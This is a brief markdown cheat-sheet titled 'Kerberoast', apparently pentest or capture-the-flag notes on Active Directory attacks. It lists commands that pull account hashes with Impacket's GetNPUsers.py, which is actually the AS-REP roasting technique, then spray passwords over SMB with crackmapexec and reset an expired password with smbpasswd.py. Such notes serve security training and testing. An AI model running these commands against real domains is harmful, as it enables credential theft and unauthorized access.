# Kerberoast

## Usage

* Impacket's `GetNPUsers.py` to get Hashes of userlist
```sh
GetNPUsers.py -no-pass <DomainName>/  -usersfile users.txt -format john -outputfile hashes
```

* Use crackmapexec to gain access to further user accounts with the password of the user found with `GetNPUsers.py`
```sh
crackmapexec smb $TARGET_IP -u users.txt -p pass.txt
```
    * Watch out for `STATUS_PASSWORD_MUST_CHANGE`
    * Change password with 
```sh
smbpasswd.py <user>@$TARGET_IP  -newpass password123
```